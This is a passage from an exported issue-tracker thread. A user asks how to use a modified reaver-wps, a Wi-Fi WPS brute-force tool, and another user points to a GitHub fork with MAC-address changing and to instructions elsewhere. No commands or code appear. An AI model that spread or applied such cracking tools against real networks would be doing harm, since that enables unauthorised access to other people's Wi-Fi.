and also write about how to use it step by step with example

Original comment by patilary...@gmail.com on 12 Apr 2014 at 7:31

GoogleCodeExporter commented 9 years ago
Patilary, download the code from my git repository: 
https://github.com/gabrielrcouto/reaver-wps, it's working and it's the same of 
reaver-1.4-mac-changer.tar.gz.

About the step by step (guide), you will find some instructions on my git 
repository or you can use the bash script posted on this thread by muske.

Xas, I can improve the generation of random macs, but I need to find a new 
notebook, on my macbook the reaver doesnt work =(

Original comment by gabrielr...@gmail.com on 13 Apr 2014 at 3:17